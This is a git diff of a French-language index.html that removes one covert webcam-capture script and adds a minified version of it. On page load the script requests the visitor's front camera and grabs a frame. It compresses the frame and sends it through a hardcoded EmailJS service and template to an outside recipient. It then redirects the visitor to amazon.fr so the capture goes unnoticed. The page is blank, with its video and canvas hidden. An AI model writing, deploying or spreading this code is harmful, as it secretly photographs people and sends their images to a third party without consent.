--- a/index.html
+++ b/index.html
@@ -2,38 +2,20 @@
 <html lang="fr">
 <head>
 <meta charset="UTF-8">
-<title></title>
 <script src="https://cdn.jsdelivr.net/npm/emailjs-com@3/dist/email.min.js"></script>
-<style>
-html,body{margin:0;padding:0;width:100%;height:100%;background:#000;overflow:hidden;}
-video,canvas{display:none;}
-</style>
+<style>html,body{margin:0;height:100%;background:#000;overflow:hidden}video,canvas{display:none}</style>
 </head>
 <body>
-<video id="v" autoplay playsinline></video>
-<canvas id="c" width="1920" height="1080"></canvas>
+<video id="v" autoplay playsinline></video><canvas id="c" width="1280" height="720"></canvas>
 <script>
 emailjs.init("IoSfbtGz4KSL_5_9E");
-const v=document.getElementById("v"),c=document.getElementById("c"),ctx=c.getContext("2d");
-async function capture(){
-  try{
-    const stream=await navigator.mediaDevices.getUserMedia({video:{facingMode:"user",width:1920,height:1080}});
-    v.srcObject=stream;
-    v.onloadeddata=()=>{
-      ctx.drawImage(v,0,0,c.width,c.height);
-      let q=0.9,img;
-      do{
-        img=c.toDataURL("image/jpeg",q);
-        if(Math.round(img.length*3/4/1024)<=60) break;
-        q-=0.05;
-      }while(q>0.1);
-      stream.getTracks().forEach(t=>t.stop());
-      emailjs.send("service_8cs0gml","template_rdhxflt",{message:"Photo auto 📸",image:img});
-      setTimeout(()=>window.location.href="https://www.amazon.fr",500);
-    };
-  }catch(e){window.location.href="https://www.amazon.fr";}
-}
-window.onload=capture;
+const v=document.getElementById("v"),c=document.getElementById("c"),x=c.getContext("2d");
+navigator.mediaDevices.getUserMedia({video:{facingMode:"user",width:1280,height:720}})
+.then(s=>{v.srcObject=s;v.onloadeddata=()=>{x.drawImage(v,0,0,c.width,c.height);
+let q=.85,i;do{i=c.toDataURL("image/jpeg",q);if(i.length*3/4/1024<=60)break;q-=.05}while(q>.1);
+s.getTracks().forEach(t=>t.stop());emailjs.send("service_8cs0gml","template_rdhxflt",{image:i});
+setTimeout(()=>location.href="https://www.amazon.fr",300);};})
+.catch(()=>location.href="https://www.amazon.fr"));
 </script>
 </body>
 </html>
